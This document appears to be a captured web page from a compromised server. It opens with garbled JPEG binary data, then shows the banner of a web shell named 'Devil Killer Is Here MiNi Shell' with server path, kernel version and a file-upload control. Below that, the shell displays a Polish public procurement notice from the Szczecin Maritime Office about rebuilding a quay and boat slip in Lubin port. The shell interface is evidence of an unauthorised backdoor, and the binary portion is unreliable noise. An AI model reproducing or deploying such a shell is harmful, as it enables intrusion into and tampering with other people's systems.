JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210817/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210817/0015124505-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Zaprojektowanie i wykonanie robót budowlanych w ramach inwestycji Przebudowa Nabrzeża postojowego wraz z wyciągiem łodziowym w Morskim Porcie Lubin. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">URZĄD MORSKI W SZCZECINIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000145017</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Stefana Batorego 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">70-207</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">91 44 03 423</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">91 44 03 441</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@ums.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ums.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> bezpieczeństwo żeglugi i ochrona środowiska morskiego </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zaprojektowanie i wykonanie robót budowlanych w ramach inwestycji Przebudowa Nabrzeża postojowego wraz z wyciągiem łodziowym w Morskim Porcie Lubin. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-dde09c43-ff3b-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00151245</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">05</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00016647/16/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.30 Zaprojektowanie oraz wykonanie robót budowlanych w ramach inwestycji „Przebudowa Nabrzeża postojowego wraz z wyciągiem Łodziowym w Morskim Porcie Lubin.”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt „Poprawa infrastruktury w małych portach Mrzeżyno, Niechorze, Lubin, Trzebież, procentowa wielkość wydatków kwalifikowalnych pochodzących z budżetu UE -75%” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ums.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ums.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">zamawiający określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie,<br/>tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji<br/>w przypadku Internet Explorer minimalnie wersja 10.0,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie pdf.<br/>11) zamawiający określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające prawidłowe<br/>złożenie podpisu elektronicznego:<br/>a) rekomendowaną przeglądarką do złożenia oferty jest MS Internet Explorer lub Firefox w wersji<br/>wpieranej przez producenta,<br/>b) uruchomienie oprogramowania do składania podpisu wymaga również zainstalowania Java w wersji<br/>1.8.0_65 lub nowszej, koniecznie w wersji 32-bitowej, pozwalające na przyjmowanie przez użytkownika<br/>sesyjnych plików cookie oraz obsługującej szyfrowanie. Konieczne jest również dodanie adresu witryny platformy eZamawiający (ezamawiający.pl) do wyjątków (exception site list) w Javie. Uwaga: wymaga<br/>to uprawnień administracyjnych na komputerze,<br/>c) zainstaluj dedykowany komponent Szafir SDK oraz aplikację Szafir Host, który odpowiada za<br/>obsługę funkcjonalności podpisu elektronicznego w platformie eZamawiający. Rozszerzenie Szafir<br/>SDK można pobrać tutaj. Po zainstalowaniu rozszerzenia Szafir SDK oraz aplikacji Szafir Host należy<br/>przeładować bieżącą stronę,<br/>d) przed uruchomieniem platformy eZamawiający, w pierwszej kolejności podłącz czytnik z kartą<br/>kryptograficzną do komputera,<br/>12) zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB<br/>w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg,<br/>wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd,<br/>gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc,<br/>13) zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.: plik załączony<br/>przez wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany –<br/>format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez<br/>zamawiającego po upływie terminu otwarcia ofert,<br/>14) oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss)<br/>generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Informacja dotycząca RODO, tj. rozporządzenie<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych<br/>w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych<br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1). <br/>2. Wykonawca ubiegając się o udzielenie zamówienia publicznego jest zobowiązany do wypełnienia<br/>obowiązków wynikających z RODO), w szczególności obowiązek informacyjny przewidziany w art. 13<br/>RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te wykonawca<br/>bezpośrednio pozyskał. Jednakże obowiązek informacyjny wynikający z art. 13 RODO nie będzie miał<br/>zastosowania, gdy w zakresie, w jakim osoba fizyczna, której dane dotyczą, dysponuje już tymi<br/>informacjami (vide: art. 13 ust. 4).<br/>3. Ponadto wykonawca musi wypełnić obowiązek informacyjny wynikający z art. 14 RODO względem<br/>osób fizycznych, których dane przekazuje zamawiającemu<br/>i których dane pośrednio pozyskał, chyba że ma zastosowanie co najmniej jedno z włączeń, o których<br/>mowa w art. 14 ust. 5 RODO.<br/>4. W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie<br/>uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem<br/>wykonawcy w postępowaniu, wykonawca zobowiązany jest do złożenia oświadczenia znajdującego się<br/>w elektronicznym formularzu ofertowym.<br/>5. Klauzula informacyjna dot. postępowania o udzielenie zamówienia publicznego - Zgodnie z art. 13<br/>ust. 1-3 Rozporządzenia 2016/679 Parlamentu Europejskiego i Rady (UE) z dnia 27 kwietnia 2016 r. -<br/>ogólne rozporządzenie o ochronie danych (Dz. Urz. UE L 119 z 04.05.2016) zamawiający informuje:<br/>1) Administratorem Danych osobowych przetwarzanych w związku z przeprowadzanym<br/>postępowaniem o udzielenie zamówienia jest Dyrektor Urzędu Morskiego w Szczecinie, z siedzibą w<br/>Szczecinie, pl. Stefana Batorego 4, 70-207 Szczecin, zwany dalej Administratorem.<br/>2) Administrator wyznaczył Inspektora Ochrony Danych, z którym można się skontaktować w sprawach<br/>dotyczących ochrony danych osobowych pod adresem e-mail:IOD@ums.gov.pl lub numerem telefonu:<br/>91-44 03 309 lub pisemnie na adres siedziby Administratora.<br/>3) Administrator przetwarza Pani/Pana dane osobowe w celu przeprowadzenia postępowania o<br/>udzielenie zamówienia, zawarcia i realizacji umowy, wykonania zlecenia lub usługi – zgodnie z<br/>wymogami przepisów prawa, min. z art. 6 ust.1 lit.b,c lub e RODO, ustawą z 11 września 2019 r –<br/>Prawo zamówień publicznych (Dz.U. 2021.1129 ze zm.)<br/>4) Administrator będzie przetwarzać wyłącznie niezbędne dane osobowe, w szczególności:<br/>a) imię i nazwisko,<br/>b) NIP, numer REGON, numer KRS,<br/>c) adres siedziby, adres korespondencyjny, adres zamieszkania.<br/>5) Okres przetwarzania Pani/Pana danych zależy od trwania zawartej umowy, a po jej zakończeniu od<br/>okresu wymaganego kategorią archiwalną zgodnie z ustawą z 14 lipca 1983 r. o narodowym zasobie<br/>archiwalnym i archiwach.<br/>6) Odbiorcami Pani/Pana danych osobowych będą wyłącznie podmioty uprawnione do uzyskania<br/>danych osobowych na podstawie obowiązujących przepisów prawa oraz podmioty realizujące usługi<br/>na rzecz Administratora. Odbiorcą danych może być w szczególności:<br/>a) operator pocztowy w przypadku prowadzenia korespondencji,<br/>b) bank realizujący usługi bankowe<br/>Szczegóły dotyczące odbiorców można uzyskać w siedzibie Administratora</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">: 7) W związku z przetwarzaniem Pani/Pana danych<br/>osobowych przysługują następujące prawa:<br/>a) prawo dostępu do treści danych osobowych;<br/>b) prawo do żądania sprostowania danych osobowych – w przypadku gdy dane są nieprawidłowe lub<br/>niekompletne;<br/>c) prawo do usunięcia danych osobowych – w razie, gdy ustała podstawa do ich przetwarzania, dane<br/>osobowe przetwarzane są niezgodnie z prawem, dane osobowe muszą być usunięte w celu<br/>wywiązania się z obowiązku wynikającego z przepisów prawa;<br/>d) prawo do żądania ograniczenia przetwarzania danych osobowych – w przypadku gdy: osoba, której<br/>dane osobowe dotyczą, kwestionuje prawidłowość danych osobowych, przetwarzanie danych jest<br/>niezgodne z prawem, a osoba, której dane dotyczą, sprzeciwia się usunięciu danych, żądając w<br/>zamian ich ograniczenia, Administrator nie potrzebuje już danych do swoich celów, ale osoba której<br/>dotyczą, potrzebuje ich do ustalenia, obrony lub dochodzenia roszczeń;<br/>e) przenoszenia danych.8) Podanie danych jest dobrowolne, jednak niezbędne do realizacji celu przetwarzania, jakim jest<br/>przeprowadzenie postępowania o udzielenie zamówienia publicznego.<br/>9) Podane przez Panią/Pana dane osobowe nie będą przetwarzane w sposób zautomatyzowany, w<br/>tym również w formie profilowania. Państwa dane nie są też przekazywane do państwa trzecich lub<br/>organizacji międzynarodowych w rozumieniu przepisów RODO.\<br/>10) Ma Pani/Pan prawo wniesienia skargi do organu nadzorczego, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO, tj. Prezesa Urzędu<br/>Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.<br/>6. Składając oferty/oświadczenia/dokumenty poprzez Platformę elektroniczną - Odbiorcą Pani/Pana<br/>danych osobowych będzie również spółka Otwarty Rynek Elektroniczny S.A. siedzibą w Warszawie<br/>(02-672) przy ul. Domaniewskiej 49, wpisaną do Rejestru Przedsiębiorców Krajowego Rejestru<br/>Sądowego, prowadzonego przez Sąd Rejonowy dla m.st. Warszawy w Warszawie XIII Wydział<br/>Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS: 0000041441, REGON: 017282436,<br/>NIP: 526-25-35-153, jako właściciel Platformy elektronicznej, na której Zamawiający prowadzi<br/>postępowania o udzielenie zamówienia publicznego, działającą pod adresem:<br/>https://ums.ezamawiajacy.pl.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PO-II.2610.44.21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zaprojektowanie oraz wykonanie robót budowlanych w ramach Inwestycji pn. „Przebudowa Nabrzeża Postojowego wraz z wyciągiem łodziowym w Morskim Porcie Lubin” <br/>3.	Przedmiot niniejszego zamówienia obejmuje w szczególności:<br/>1)	Etap I i Etap II:<br/>a)	sporządzenie mapy do celów projektowych,<br/>b)	aktualizację planu batymetrycznego,<br/>c)	przeszukanie ferromagnetyczne obszaru lądowego i wodnego,<br/>d)	sporządzenie dokumentacji geologiczno – inżynierskiej,<br/>e)	sporządzenie dokumentacji projektowej,<br/>f)	uzyskanie kompletu decyzji administracyjnych, w szczególności: decyzji o środowiskowych uwarunkowaniach, decyzji o lokalizacji inwestycji celu publicznego, pozwolenia wodnoprawnego, pozwolenia na wznoszenie i wykorzystywanie sztucznych wysp, konstrukcji i urządzeń na obszarach morskich RP, decyzji pozwolenia na czasowe zajęcie wód morskich (o ile dotyczy), decyzji pozwolenia na budowę,<br/>2)	Etap III:<br/>a)	wykonanie robót przygotowawczych, rozbiórkowych, kafarowych, ziemnych, żelbetowych, malarskich i antykorozyjnych, montażowych,<br/>b)	sporządzenie dokumentacji wykonawczej i powykonawczej,<br/>c)	uzyskanie decyzji o pozwoleniu na użytkowanie (o ile wymagane) lub złożenie zawiadomienia o zakończeniu budowy bez sprzeciwu organu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71332000-4 - Geotechniczne usługi inżynieryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45241500-3 - Roboty budowlane w zakresie nabrzeży</p> <p class="mb-0">45241600-4 - Instalowanie oświetlenia portowego</p> <p class="mb-0">45244000-9 - Wodne roboty budowlane</p> <p class="mb-0">71315000-9 - Usługi budowlane</p> <p class="mb-0">71326000-9 - Dodatkowe usługi budowlane</p> <p class="mb-0">71400000-2 - Usługi architektoniczne dotyczące planowania przestrzennego i zagospodarowania terenu</p> <p class="mb-0">71410000-5 - Usługi planowania przestrzennego</p> <p class="mb-0">71530000-2 - Doradcze usługi budowlane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">19 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Podana w ofercie cena musi być wyrażona w złotych. Cena musi uwzględniać wynagrodzenie Wykonawcy łącznie z podatkiem VAT za wykonanie całego przedmiotu zamówienia opisanego w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia (T)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe Specjalisty nr 1 – Przedstawiciela Wykonawcy (D)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie niniejszego zamówienia ubiegać się mogą Wykonawcy, którzy wykażą, że spełniają następujące warunki dotyczące:<br/><br/>1)	Zdolności do występowania w obrocie gospodarczym:<br/><br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>2)	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/><br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>3)	Sytuacji ekonomicznej lub finansowej:<br/><br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/><br/>a)	posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą niż 1.000.000,00 zł (słownie: jeden milion złotych 00/100),<br/><br/>b)	posiada zdolność kredytową lub środki finansowe w wysokości nie niższej niż 1.000.000,00 zł (słownie: jeden milion złotych 00/100).<br/><br/>4)	Zdolności technicznej lub zawodowej:<br/><br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/><br/>a)	posiada niezbędną wiedzę i doświadczenie. W szczególności Wykonawca musi spełniać warunek w postaci wykonania z należytą starannością w okresie ostatnich 7 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej <br/>2 zakończonych1 inwestycji polegających na budowie lub przebudowie morskich budowli hydrotechnicznych2 (m.in. nabrzeża i/lub falochrony, pirsy i/lub mola i/lub umocnienia brzegowe) o wartości co najmniej 2.000.000,00 złotych (równowartość tej kwoty) brutto każda.<br/>1 Jako wykonanie (zakończenie) inwestycji należy rozumieć wystawienie Świadectwa Przejęcia (dla kontraktów realizowanych według warunków kontraktowych FIDIC) albo podpisanie protokołu odbioru robót lub dokumentu równoważnego (dla innych umów).<br/><br/>2 Za morską budowlę hydrotechniczną Zamawiający uzna obiekt w rozumieniu rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 1 czerwca 1998 r. w sprawie warunków technicznych, jakim powinny odpowiadać morskie budowle hydrotechniczne i ich usytuowanie (Dz. U. z 1998 r. Nr 101, poz. 645).<br/><br/>b)	dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia. W szczególności Wykonawca musi spełniać warunek w postaci dysponowania zespołem osób zdolnych do wykonania zamówienia, składającym się co najmniej z:<br/><br/>(i)	